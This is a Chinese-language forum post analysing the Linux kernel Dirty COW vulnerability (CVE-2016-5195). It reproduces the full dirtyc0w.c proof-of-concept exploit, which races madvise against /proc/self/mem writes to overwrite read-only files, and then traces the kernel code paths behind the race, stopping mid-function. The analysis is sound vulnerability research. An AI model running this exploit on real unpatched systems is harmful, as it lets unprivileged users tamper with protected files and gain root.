首页
论坛
课程
招聘
[原创]Linux内核[CVE-2016-5195] (dirty COW)原理分析
2020-12-11 18:44 9190

[原创]Linux内核[CVE-2016-5195] (dirty COW)原理分析

2020-12-11 18:44
9190

环境搭建

本机环境

Ubuntu 16.04,内核版本4.15.0-45-generic

下载内核版本4.4的源码并编译

1
sudo wget https://mirror.tuna.tsinghua.edu.cn/kernel/v4.x/linux-4.4.tar.xz

清华源,就是快!

1
make bzImage -j4

很快啊,编译好了。

测试

 

一开始是aaaaaa

 

 

发现成功改掉。漏洞存在。

简述

在了解漏洞细节之前,首先要明确如下概念。

Copy-On-Write

P1 P2是两个process,而P2由P1fork()产生。那么此时其实P1和P2是共享一块空间的。当对这同一块空间进行了修改时,才会拷贝出一份。

 

这种考虑基于:

 

1.子进程中往往会调用exec()族的函数实现其具体的功能。(一个进程想要执行另一个程序。既然创建新进程的唯一方法为调用fork,该进程于是首先调用fork创建一个自身的拷贝,然后其中一个拷贝(通常为子进程)调用exec把自身替换成新的程序。这是诸如shell之类程序的典型用法) 。而exec族函数有一个特点是,当他执行成功时,控制流直接转向新的程序的起点(比如glibc pwn中最常用的,通过hijack mallochook去打one_gadget执行execve起shell)

 

2.fork()实际只是创建了一个与父进程pid不一样的副本,如果这个时候把整个父进程的数据完整的拷贝一份到子进程的新空间,但exec系列函数在执行时会直接替换掉当前进程的地址空间意味着我们做的拷贝是无效的,所以就要进行效率的优化

 

于是COW机制出现了。

 

Suppose, there is a process P1 that creates a new process P2 and then process P1 modifies page 3.
The below figures shows what happens before and after process P modifies page 3.

 

madvise()

原型:int madvise(void *addr, size_t length, int advice);

 

告诉内核:在从 addr 指定的地址开始,长度等于 len 参数值的范围内,该区域的用户虚拟内存应遵循特定的使用模式。

 

advise参数选择如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
MADV_ACCESS_DEFAULT
此标志将指定范围的内核预期访问模式重置为缺省设置。
 
MADV_ACCESS_LWP
此标志通知内核,移近指定地址范围的下一个 LWP 就是将要访问此范围次数最多的 LWP。内核将相应地为此范围和 LWP 分配内存和其他资源。
 
MADV_ACCESS_MANY
此标志建议内核,许多进程或 LWP 将在系统内随机访问指定的地址范围。内核将相应地为此范围分配内存和其他资源。
 
MADV_DONTNEED
Do not expect access in the near future.  (For the time being,
              the application is finished with the given range, so the
              kernel can free resources associated with it.)

此系统调用相当于通知内核addr~addr+len的内存在接下来不再使用,内核将释放掉这一块内存以节省空间,相应的页表项也会被置空。

POC

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
/*
####################### dirtyc0w.c #######################
$ sudo -s
# echo this is not a test > foo
# chmod 0404 foo
$ ls -lah foo
-r-----r-- 1 root root 19 Oct 20 15:23 foo
$ cat foo
this is not a test
$ gcc -pthread dirtyc0w.c -o dirtyc0w
$ ./dirtyc0w foo m00000000000000000
mmap 56123000
madvise 0
procselfmem 1800000000
$ cat foo
m00000000000000000
####################### dirtyc0w.c #######################
*/
#include <stdio.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <pthread.h>
#include <unistd.h>
#include <sys/stat.h>
#include <string.h>
#include <stdint.h>
 
void *map;
int f;
struct stat st;
char *name;
 
void *madviseThread(void *arg)
{
  char *str;
  str=(char*)arg;
  int i,c=0;
  for(i=0;i<100000000;i++)
  {
/*
You have to race madvise(MADV_DONTNEED) :: https://access.redhat.com/security/vulnerabilities/2706661
> This is achieved by racing the madvise(MADV_DONTNEED) system call
> while having the page of the executable mmapped in memory.
*/
    c+=madvise(map,100,MADV_DONTNEED);
  }
  printf("madvise %d\n\n",c);
}
 
void *procselfmemThread(void *arg)
{
  char *str;
  str=(char*)arg;
/*
You have to write to /proc/self/mem :: https://bugzilla.redhat.com/show_bug.cgi?id=1384344#c16
>  The in the wild exploit we are aware of doesn't work on Red Hat
>  Enterprise Linux 5 and 6 out of the box because on one side of
>  the race it writes to /proc/self/mem, but /proc/self/mem is not
>  writable on Red Hat Enterprise Linux 5 and 6.
*/
  int f=open("/proc/self/mem",O_RDWR);
  int i,c=0;
  for(i=0;i<100000000;i++) {
/*
You have to reset the file pointer to the memory position.
*/
    lseek(f,(uintptr_t) map,SEEK_SET);
    c+=write(f,str,strlen(str));
  }
  printf("procselfmem %d\n\n", c);
}
 
 
int main(int argc,char *argv[])
{
/*
You have to pass two arguments. File and Contents.
*/
  if (argc<3) {
  (void)fprintf(stderr, "%s\n",
      "usage: dirtyc0w target_file new_content");
  return 1; }
  pthread_t pth1,pth2;
/*
You have to open the file in read only mode.
*/
  f=open(argv[1],O_RDONLY);
  fstat(f,&st);
  name=argv[1];
/*
You have to use MAP_PRIVATE for copy-on-write mapping.
> Create a private copy-on-write mapping.  Updates to the
> mapping are not visible to other processes mapping the same
> file, and are not carried through to the underlying file.  It
> is unspecified whether changes made to the file after the
> mmap() call are visible in the mapped region.
*/
/*
You have to open with PROT_READ.
*/
  map=mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0);
  printf("mmap %zx\n\n",(uintptr_t) map);
/*
You have to do it on two threads.
*/
  pthread_create(&pth1,NULL,madviseThread,argv[1]);
  pthread_create(&pth2,NULL,procselfmemThread,argv[2]);
/*
You have to wait for the threads to finish.
*/
  pthread_join(pth1,NULL);
  pthread_join(pth2,NULL);
  return 0;
}

过程

1.首先我们创建了一个foo文件,并且他的权限是 只读

 

2.我们以read_only打开,返回了f=fd。并获取了对应的文件描述符的状态储存到st结构体中(类型struct stat )

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
struct stat64 {
    unsigned long long    st_dev;
    unsigned char    __pad0[4];
 
    unsigned long    __st_ino;
 
    unsigned int    st_mode;
    unsigned int    st_nlink;
 
    unsigned long    st_uid;
    unsigned long    st_gid;
 
    unsigned long long    st_rdev;
    unsigned char    __pad3[4];
 
    long long    st_size;
    unsigned long    st_blksize;
 
    /* Number 512-byte blocks allocated. */
    unsigned long long    st_blocks;
 
    unsigned long    st_atime;
    unsigned long    st_atime_nsec;
 
    unsigned long    st_mtime;
    unsigned int    st_mtime_nsec;
 
    unsigned long    st_ctime;
    unsigned long    st_ctime_nsec;
 
    unsigned long long    st_ino;
};

3.接下来使用mmap将此文件的内容 以私有的写时复制 映射到了用户空间。其中各个参数代表的含义如下:

1
2
3
4
5
map=mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0);
 
//原型
void *mmap(void *addr, size_t length, int prot, int flags,
                  int fd, off_t offset);
  • addr=NULL,代表让内核选取一个合适的地址。
  • length代表要映射的进程地址空间的大小。这里是文件的大小。
  • prot代表映射区域的读写属性。这里是只读。
  • flags设置内存映射的属性。这里是 MAP_PRIVATE 创建一个私有的写时复制的映射。(多个process可以通过私有映射访问同一个文件,并且修改后 不会同步到磁盘文件中
  • fd代表这是一个文件映射。
  • offset是指在文件映射中的偏移量。

4.启动两个线程:madviseThreadprocselfmemThread

procselfmemThread线程

参数为我们要写入的:m0000000字符串。

 

首先他以RDWR打开了 /proc/self/mem(对于当前进程来说,/proc/self/mem是进程的内存内容,通过修改该文件相当于直接修改当前进程的内存),但是如果你测试一下会发现:

1
2
root@ubuntu:~/linux-4.4-env# cat /proc/66310/mem
cat: /proc/66310/mem: Input/output error

这是因为:我们无法读取没有被正确映射的区域,只有读取的偏移值是被映射的区域才能正确读取内存内容。所以需要配合lseek来调整内存写的位置。原型如下:

1
off_t lseek(int fd, off_t offset, int whence);

我们在POC中将位置调整到mmap返回的位置(也就是文件被映射的位置)。SEEK_SET 参数告诉系统offset 即为新的读写位置。之后进行100000000次写操作来试图改变此内存的内容。(mmap的时候只有读权限

madviseThread线程

这个线程很简单就是调用100000000次madvise将对应的mmap出来的addr空间到addr+100设置为MADV_DONTNEED

 

而这两个线程是跑在竞争态的。

竞态详细分析

经过以上的讲解,应该已经明白了大概是在干嘛。

 

dirty COW正如其名:dirty(脏)、COW(写时复制)

 

接下来深入竞争细节进行分析。

 

write(f,str,strlen(str)) 时调用流如下:

1
2
3
4
5
6
__get_free_pages+14           
mem_rw.isra+69               
mem_write+27               
__vfs_write+55               
vfs_write+169               
sys_write+85

write执行流分析

mem_write

1
2
3
4
5
static ssize_t mem_write(struct file *file, const char __user *buf,
             size_t count, loff_t *ppos)
{
    return mem_rw(file, (char __user*)buf, count, ppos, 1);
}

底层调用mem_rw,此时的file结构体对应的是 /proc/self/mem。buf是用户态的要写入的内容,count为大小,ppos为偏移。

mem_rw

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
static ssize_t mem_rw(struct file *file, char __user *buf,
            size_t count, loff_t *ppos, int write)            //write=1
{
    struct mm_struct *mm = file->private_data;   
    unsigned long addr = *ppos;
    ssize_t copied;
    char *page;
 
    if (!mm)
        return 0;
 
    page = (char *)__get_free_page(GFP_TEMPORARY);        //获取一个free page,返回指向新页面的指针并将页面清零
    if (!page)
        return -ENOMEM;
 
    copied = 0;
    if (!atomic_inc_not_zero(&mm->mm_users))//atomic_inc_not_zero(v)用于将atomic_t变量*v加1,并测试加1后的*v是否不为零,如果不为零则返回真,这里将mm->mm_users+1,测试是否为0
        goto free;                            //0的话就free掉
 
    while (count > 0) {                        //size大于0进入while
 
        int this_len = min_t(int, count, PAGE_SIZE);    //类型为int。count 返回 PAGE_SIZE中更小的那个
 
        if (write && copy_from_user(page, buf, this_len)) {// 将 buf拷贝size到新申请的page上
            copied = -EFAULT;
            break;
        }
 
        this_len = access_remote_vm(mm, addr, page, this_len, write); //write=1
        if (!this_len) {
            if (!copied)
                copied = -EIO;
            break;
        }
 
        if (!write && copy_to_user(buf, page, this_len)) {
            copied = -EFAULT;
            break;
        }
 
        buf += this_len;
        addr += this_len;
        copied += this_len;
        count -= this_len;
    }
    *ppos = addr;
 
    mmput(mm);
 
free:
    free_page((unsigned long) page);            //free申请出来的页
    return copied;
}

首先新建一个mm_struct.

 

mm_struct 定义如下:

 

用来描述linux下进程的内存地址空间的所有的信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
struct mm_struct {
 
    //指向线性区对象的链表头
    struct vm_area_struct * mmap;       /* list of VMAs */
    //指向线性区对象的红黑树
    struct rb_root mm_rb;
    //指向最近找到的虚拟区间
    struct vm_area_struct * mmap_cache; /* last find_vma result */
 
    //用来在进程地址空间中搜索有效的进程地址空间的函数
    unsigned long (*get_unmapped_area) (struct file *filp,
                unsigned long addr, unsigned long len,
                unsigned long pgoff, unsigned long flags);
 
       unsigned long (*get_unmapped_exec_area) (struct file *filp,
                unsigned long addr, unsigned long len,
                unsigned long pgoff, unsigned long flags);
 
    //释放线性区时调用的方法,         
    void (*unmap_area) (struct mm_struct *mm, unsigned long addr);
 
    //标识第一个分配文件内存映射的线性地址
    unsigned long mmap_base;        /* base of mmap area */
 
 
    unsigned long task_size;        /* size of task vm space */
    /*
     * RHEL6 special for bug 790921: this same variable can mean
     * two different things. If sysctl_unmap_area_factor is zero,
     * this means the largest hole below free_area_cache. If the
     * sysctl is set to a positive value, this variable is used
     * to count how much memory has been munmapped from this process
     * since the last time free_area_cache was reset back to mmap_base.
     * This is ugly, but necessary to preserve kABI.
     */
    unsigned long cached_hole_size;
 
    //内核进程搜索进程地址空间中线性地址的空间空间
    unsigned long free_area_cache;      /* first hole of size cached_hole_size or larger */
 
    //指向页表的目录
    pgd_t * pgd;
 
    //共享进程时的个数
    atomic_t mm_users;          /* How many users with user space? */
 
    //内存描述符的主使用计数器,采用引用计数的原理,当为0时代表无用户再次使用
    atomic_t mm_count;          /* How many references to "struct mm_struct" (users count as 1) */
 
    //线性区的个数
    int map_count;              /* number of VMAs */
 
    struct rw_semaphore mmap_sem;
 
    //保护任务页表和引用计数的锁
    spinlock_t page_table_lock;     /* Protects page tables and some counters */
 
    //mm_struct结构,第一个成员就是初始化的mm_struct结构,
    struct list_head mmlist;        /* List of maybe swapped mm's.  These are globally strung
                         * together off init_mm.mmlist, and are protected
                         * by mmlist_lock
                         */
 
    /* Special counters, in some configurations protected by the
     * page_table_lock, in other configurations by being atomic.
     */
 
    mm_counter_t _file_rss;
    mm_counter_t _anon_rss;
    mm_counter_t _swap_usage;
 
    //进程拥有的最大页表数目
    unsigned long hiwater_rss;  /* High-watermark of RSS usage */
    //进程线性区的最大页表数目
    unsigned long hiwater_vm;   /* High-water virtual memory usage */
 
    //进程地址空间的大小,锁住无法换页的个数,共享文件内存映射的页数,可执行内存映射中的页数
    unsigned long total_vm, locked_vm, shared_vm, exec_vm;
    //用户态堆栈的页数,
    unsigned long stack_vm, reserved_vm, def_flags, nr_ptes;
    //维护代码段和数据段
    unsigned long start_code, end_code, start_data, end_data;
    //维护堆和栈
    unsigned long start_brk, brk, start_stack;
    //维护命令行参数,命令行参数的起始地址和最后地址,以及环境变量的起始地址和最后地址
    unsigned long arg_start, arg_end, env_start, env_end;
 
    unsigned long saved_auxv[AT_VECTOR_SIZE]; /* for /proc/PID/auxv */
 
    struct linux_binfmt *binfmt;
 
    cpumask_t cpu_vm_mask;
 
    /* Architecture-specific MM context */
    mm_context_t context;
 
    /* Swap token stuff */
    /*
     * Last value of global fault stamp as seen by this process.
     * In other words, this value gives an indication of how long
     * it has been since this task got the token.
     * Look at mm/thrash.c
     */
    unsigned int faultstamp;
    unsigned int token_priority;
    unsigned int last_interval;
 
    //线性区的默认访问标志
    unsigned long flags; /* Must use atomic bitops to access the bits */
 
    struct core_state *core_state; /* coredumping support */
#ifdef CONFIG_AIO
    spinlock_t      ioctx_lock;
    struct hlist_head   ioctx_list;
#endif
#ifdef CONFIG_MM_OWNER
    /*
     * "owner" points to a task that is regarded as the canonical
     * user/owner of this mm. All of the following must be true in
     * order for it to be changed:
     *
     * current == mm->owner
     * current->mm != mm
     * new_owner->mm == mm
     * new_owner->alloc_lock is held
     */
    struct task_struct *owner;
#endif
 
#ifdef CONFIG_PROC_FS
    /* store ref to file /proc/<pid>/exe symlink points to */
    struct file *exe_file;
    unsigned long num_exe_file_vmas;
#endif
#ifdef CONFIG_MMU_NOTIFIER
    struct mmu_notifier_mm *mmu_notifier_mm;
#endif
#ifdef CONFIG_TRANSPARENT_HUGEPAGE
    pgtable_t pmd_huge_pte; /* protected by page_table_lock */
#endif
    /* reserved for Red Hat */
#ifdef __GENKSYMS__
    unsigned long rh_reserved[2];
#else
    /* How many tasks sharing this mm are OOM_DISABLE */
    union {
        unsigned long rh_reserved_aux;
        atomic_t oom_disable_count;
    };
 
    /* base of lib map area (ASCII armour) */
    unsigned long shlib_base;
#endif
};

他与task_struct的关系如下:

 

系统为每个进程维护一个task_struct(进程描述符),tast_struct记录了进程所有的context信息,而其中就包括了内存描述符mm_struct(其中的域抽象了进程的地址空间)

 

 

如果加上vma结构体的话:

 

 

其中重要的几个:

  • mm_user:表示正在引用该地址空间的thread数目。是一个线程级的计数器。
  • mm_counter:表示这个地址空间被内核线程引用的次数+1
  • 当 mm_user 和 mm_counter 都等于0的时候才会free这一块mm_struct,代表此时既没有用户级进程使用此地址空间,也没有内核级线程引用。

首先申请一个新的page,之后会进入 access_remote_vm

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
/**
 * access_remote_vm - access another process' address space
 * @mm:        the mm_struct of the target address space
 * @addr:    start address to access
 * @buf:    source or destination buffer
 * @len:    number of bytes to transfer
 * @write:    whether the access is a write
 *
 * The caller must hold a reference on @mm.
 */
int access_remote_vm(struct mm_struct *mm, unsigned long addr,
        void *buf, int len, int write)
{
    return __access_remote_vm(NULL, mm, addr, buf, len, write);
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
/*
 * Access another process' address space as given in mm.  If non-NULL, use the
 * given task for page fault accounting.
 */
static int __access_remote_vm(struct task_struct *tsk, struct mm_struct *mm,
        unsigned long addr, void *buf, int len, int write)
{
    struct vm_area_struct *vma;
    void *old_buf = buf;
 
    down_read(&mm->mmap_sem);
    /* ignore errors, just check how much was successfully transferred */
    while (len) {
        int bytes, ret, offset;
        void *maddr;
        struct page *page = NULL;
 
        ret = get_user_pages(tsk, mm, addr, 1,
                write, 1, &page, &vma);
 
        if (ret <= 0) {
#ifndef CONFIG_HAVE_IOREMAP_PROT
            break;
#else
            /*
             * Check if this is a VM_IO | VM_PFNMAP VMA, which
             * we can access using slightly different code.
             */
            vma = find_vma(mm, addr);
            if (!vma || vma->vm_start > addr)
                break;
            if (vma->vm_ops && vma->vm_ops->access)
                ret = vma->vm_ops->access(vma, addr, buf,
                              len, write);
            if (ret <= 0)
                break;
            bytes = ret;
#endif
        } else {
            bytes = len;
            offset = addr & (PAGE_SIZE-1);
            if (bytes > PAGE_SIZE-offset)
                bytes = PAGE_SIZE-offset;
 
            maddr = kmap(page);
            if (write) {
                copy_to_user_page(vma, page, addr,
                          maddr + offset, buf, bytes);
                set_page_dirty_lock(page);
            } else {
                copy_from_user_page(vma, page, addr,
                            buf, maddr + offset, bytes);
            }
            kunmap(page);
            page_cache_release(page);
        }
        len -= bytes;
        buf += bytes;
        addr += bytes;
    }
    up_read(&mm->mmap_sem);
 
    return buf - old_buf;
}

而 get_user_pages -> get_user_pages_locked -> \get_user_pages,这一系列调用是由于write系统调用在内核中会执行get_user_pages以获取需要写入的内存页。

 

__get_user_pages如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
long __get_user_pages(struct task_struct *tsk, struct mm_struct *mm,
        unsigned long start, unsigned long nr_pages,
        unsigned int gup_flags, struct page **pages,
        struct vm_area_struct **vmas, int *nonblocking)
{
    long i = 0;
    unsigned int page_mask;
    struct vm_area_struct *vma = NULL;
 
    if (!nr_pages)
        return 0;
 
    VM_BUG_ON(!!pages != !!(gup_flags & FOLL_GET));
 
    /*
     * If FOLL_FORCE is set then do not force a full fault as the hinting
     * fault information is unrelated to the reference behaviour of a task
     * using the address space
     */
    if (!(gup_flags & FOLL_FORCE))
        gup_flags |= FOLL_NUMA;
 
    do {
        struct page *page;
        unsigned int foll_flags = gup_flags;    //访问语义标志
        unsigned int page_increm;
 
        /* first iteration or cross vma bound */
        if (!vma || start >= vma->vm_end) {
            vma = find_extend_vma(mm, start);
            if (!vma && in_gate_area(mm, start)) {
                int ret;
                ret = get_gate_page(mm, start & PAGE_MASK,
                        gup_flags, &vma,
                        pages ? &pages[i] : NULL);
                if (ret)
                    return i ? : ret;
                page_mask = 0;
                goto next_page;
            }
 
            if (!vma || check_vma_flags(vma, gup_flags))
                return i ? : -EFAULT;
            if (is_vm_hugetlb_page(vma)) {
                i = follow_hugetlb_page(mm, vma, pages, vmas,
                        &start, &nr_pages, i,
                        gup_flags);
                continue;
            }
        }
retry:
        /*
         * If we have a pending SIGKILL, don't keep faulting pages and
         * potentially allocating memory.
         */
        if (unlikely(fatal_signal_pending(current)))
            return i ? i : -ERESTARTSYS;
        cond_resched();
        page = follow_page_mask(vma, start, foll_flags, &page_mask);
        if (!page) {            //当返回为NULL时
            //(a)页表中不存在物理页即缺页
            //(b)访问语义标志foll_flags对应的权限违反内存页的权限时,follow_page_mask返回值为NULL
            //第一次是由于(a)原因
            //第二次是由于(b)原因,对应的页表项指向的内存并没有写权限,所以返回NULL
            int ret;
            ret = faultin_page(tsk, vma, start, &foll_flags,
                    nonblocking);    //调用faultin_page处理
            switch (ret) {
            case 0:
                goto retry;
            case -EFAULT:
            case -ENOMEM:
            case -EHWPOISON:
                return i ? i : ret;
            case -EBUSY:
                return i;
            case -ENOENT:
                goto next_page;
            }
            BUG();
        } else if (PTR_ERR(page) == -EEXIST) {
            /*
             * Proper page table entry exists, but no corresponding
             * struct page.
             */
            goto next_page;
        } else if (IS_ERR(page)) {
            return i ? i : PTR_ERR(page);
        }
        if (pages) {
            pages[i] = page;
            flush_anon_page(vma, page, start);
            flush_dcache_page(page);
            page_mask = 0;
        }
next_page:
        if (vmas) {
            vmas[i] = vma;
            page_mask = 0;
        }
        page_increm = 1 + (~(start >> PAGE_SHIFT) & page_mask);
        if (page_increm > nr_pages)
            page_increm = nr_pages;
        i += page_increm;
        start += page_increm * PAGE_SIZE;
        nr_pages -= page_increm;
    } while (nr_pages);
    return i;
}
EXPORT_SYMBOL(__get_user_pages);

其中有几个关键点。

  • 访问语义标志foll_flags对应的权限违反内存页的权限时,follow_page_mask返回值为NULL,会触发对faultin_page的调用。
  • follow_page_mask函数的作用是查询页表获取虚拟地址对应的物理页,它将按照linux页表的四级结构所示依次向下调用四层函数。

当第一次调用follow_page_mask的时候返回为NULL(对应的页表项指向的内存并没有写权限,与访问语义foll_flags冲突)

 

 

 

接下来调用 faultin_page 进行处理。

 

调用流程如下:

第一次page fault(缺页)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
static int faultin_page(struct task_struct *tsk, struct vm_area_struct *vma,
        unsigned long address, unsigned int *flags, int *nonblocking)
{
         ....
           ret = handle_mm_fault(mm, vma, address, fault_flags);
 
}
int handle_mm_fault(struct mm_struct *mm, struct vm_area_struct *vma,
            unsigned long address, unsigned int flags)
{
    ......
    ret = __handle_mm_fault(mm, vma, address, flags);
    .....
}
static int __handle_mm_fault(struct mm_struct *mm, struct vm_area_struct *vma,
                 unsigned long address, unsigned int flags)
{
    ......
    return handle_pte_fault(mm, vma, address, pte, pmd, flags);
}
static int handle_pte_fault(struct mm_struct *mm,
             struct vm_area_struct *vma, unsigned long address,
             pte_t *pte, pmd_t *pmd, unsigned int flags)
{
    pte_t entry;
 
    entry = *pte;
    ......
    if (!pte_present(entry)) {    //页表项是否为空?即是否为一个缺页错误?
        if (pte_none(entry)) {
            if (vma_is_anonymous(vma))                        //如果是匿名页(没有文件背景如堆,栈,数据段等,不是以文件形式存在)
                return do_anonymous_page(mm, vma, address,
                             pte, pmd, flags);
            else
                return do_fault(mm, vma, address, pte, pmd,//此时不是匿名页,调用do_fault调入页
                        flags, entry);
        }
        return do_swap_page(mm, vma, address,
                    pte, pmd, flags, entry);
    }
    ......
    if (unlikely(!pte_same(*pte, entry)))
        goto unlock;
    if (flags & FAULT_FLAG_WRITE) {            //页表项不空,但是页没有可写权限
        if (!pte_write(entry))
            return do_wp_page(mm, vma, address,
                    pte, pmd, ptl, entry);    //调用do_wp_page
        entry = pte_mkdirty(entry);
    }
    ......
}
 
 
static int do_fault(struct mm_struct *mm, struct vm_area_struct *vma,
        unsigned long address, pte_t *page_table, pmd_t *pmd,
        unsigned int flags, pte_t orig_pte)
{
    pgoff_t pgoff = (((address & PAGE_MASK)
            - vma->vm_start) >> PAGE_SHIFT) + vma->vm_pgoff;
 
    pte_unmap(page_table);
    /* The VMA was not fully populated on mmap() or missing VM_DONTEXPAND */
    if (!vma->vm_ops->fault)
        return VM_FAULT_SIGBUS;
    //如果不要求对应内存具有可写权限
    if (!(flags & FAULT_FLAG_WRITE))
        return do_read_fault(mm, vma, address, pmd, pgoff, flags,        //调用do_read_fault
                orig_pte);
    //如果要求目标内存有可写权限,并且它是一个COW的私有映射。
    if (!(vma->vm_flags & VM_SHARED))
        return do_cow_fault(mm, vma, address, pmd, pgoff, flags,        //调用do_cow_fault
                orig_pte);
 
    return do_shared_fault(mm, vma, address, pmd, pgoff, flags, orig_pte);
}
 
static int do_cow_fault(struct mm_struct *mm, struct vm_area_struct *vma,
        unsigned long address, pmd_t *pmd,
        pgoff_t pgoff, unsigned int flags, pte_t orig_pte)
{
    struct page *fault_page, *new_page;
    struct mem_cgroup *memcg;
    spinlock_t *ptl;
    pte_t *pte;
    int ret;
    ......
    new_page = alloc_page_vma(GFP_HIGHUSER_MOVABLE, vma, address);//alloc page for a VMA
    if (!new_page)
        return VM_FAULT_OOM;
 
    ......
 
    ret = __do_fault(vma, address, pgoff, flags, new_page, &fault_page);
    if (unlikely(ret & (VM_FAULT_ERROR | VM_FAULT_NOPAGE | VM_FAULT_RETRY)))
        goto uncharge_out;
 
    if (fault_page)
        copy_user_highpage(new_page, fault_page, address, vma);
    __SetPageUptodate(new_page);
 
    ......
 
    do_set_pte(vma, address, new_page, pte, true, true);    //调用do_set_pte
    mem_cgroup_commit_charge(new_page, memcg, false);
    lru_cache_add_active_or_unevictable(new_page, vma);
    pte_unmap_unlock(pte, ptl);
    if (fault_page) {
        unlock_page(fault_page);
        page_cache_release(fault_page);
    } else {
        /*
         * The fault handler has no page to lock, so it holds
         * i_mmap_lock for read to protect against truncate.
         */
        i_mmap_unlock_read(vma->vm_file->f_mapping);
    }
    return ret;
uncharge_out:
    mem_cgroup_cancel_charge(new_page, memcg);
    page_cache_release(new_page);
    return ret;
}
 
void do_set_pte(struct vm_area_struct *vma, unsigned long address,
        struct page *page, pte_t *pte, bool write, bool anon)
{
    pte_t entry;
 
    ......
    entry = mk_pte(page, vma->vm_page_prot);
    if (write)                                                //如果要写的话
        entry = maybe_mkwrite(pte_mkdirty(entry), vma);        //做ptewrite当且仅当vma的vm_flags中的VM_WRITE位置位(可写),如果执行了cow到这里,pte_mkdirty()会将对应的页标脏
 
    ......
    set_pte_at(vma->vm_mm, address, pte, entry);
 
    /* no need to invalidate: a not-present page won't be cached */
    update_mmu_cache(vma, address, pte);
}
/*
 * Do pte_mkwrite, but only if the vma says VM_WRITE.  We do this when
 * servicing faults for write access.  In the normal case, do always want
 * pte_mkwrite.  But get_user_pages can cause write faults for mappings
 * that do not have writing enabled, when used by access_process_vm.
 */
static inline pte_t maybe_mkwrite(pte_t pte, struct vm_area_struct *vma)
{
    if (likely(vma->vm_flags & VM_WRITE))
        pte = pte_mkwrite(pte);
    return pte;
}
static inline pte_t pte_mkdirty(pte_t pte)
{
    return pte_set_flags(pte, _PAGE_DIRTY | _PAGE_SOFT_DIRTY);
}
 
static int do_wp_page(struct mm_struct *mm, struct vm_area_struct *vma,
        unsigned long address, pte_t *page_table, pmd_t *pmd,
        spinlock_t *ptl, pte_t orig_pte)
    __releases(ptl)
{
    struct page *old_page;
 
    old_page = vm_normal_page(vma, address, orig_pte);//获取共享页
    if (!old_page) {                                  //获取失败
        /*
         * VM_MIXEDMAP !pfn_valid() case, or VM_SOFTDIRTY clear on a
         * VM_PFNMAP VMA.
         *
         * We should not cow pages in a shared writeable mapping.
         * Just mark the pages writable and/or call ops->pfn_mkwrite.
         */
        //如果本来就是共享且可写的话
        if ((vma->vm_flags & (VM_WRITE|VM_SHARED)) ==
                     (VM_WRITE|VM_SHARED))
            return wp_pfn_shared(mm, vma, address, page_table, ptl,
                         orig_pte, pmd);
 
        pte_unmap_unlock(page_table, ptl);
        return wp_page_copy(mm, vma, address, page_table, pmd,
                    orig_pte, old_page);
    }
 
    /*
     * Take out anonymous pages first, anonymous shared vmas are
     * not dirty accountable.
     */
    //如果是匿名页且只有一个进程使用他,则直接使用该页
    if (PageAnon(old_page) && !PageKsm(old_page)) {
        //判断是否有其他进程竞争,修改了页表
        if (!trylock_page(old_page)) {
            page_cache_get(old_page);
            pte_unmap_unlock(page_table, ptl);
            lock_page(old_page);
            page_table = pte_offset_map_lock(mm, pmd, address,
                             &ptl);
            if (!pte_same(*page_table, orig_pte)) {
                unlock_page(old_page);
                pte_unmap_unlock(page_table, ptl);
                page_cache_release(old_page);
                return 0;
            }
            page_cache_release(old_page);
        }
        //确定了没有其他进程竞争时,调用reuse_swap_page判断&page->_mapcount是否为0,是的话则表明只有一个进程使用该匿名页
        if (reuse_swap_page(old_page)) {
